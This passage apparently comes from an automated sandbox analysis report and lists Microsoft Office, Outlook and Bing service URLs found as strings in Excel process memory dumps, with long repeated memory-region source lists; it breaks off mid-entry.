    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies-lT
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aik
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt?-
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://directory.services.
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Officey
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/JH
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1vK
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1Lt
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/d2db8
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml=1
    Source: EXCEL.EXE, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtmlW1
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/QH
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/fH
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 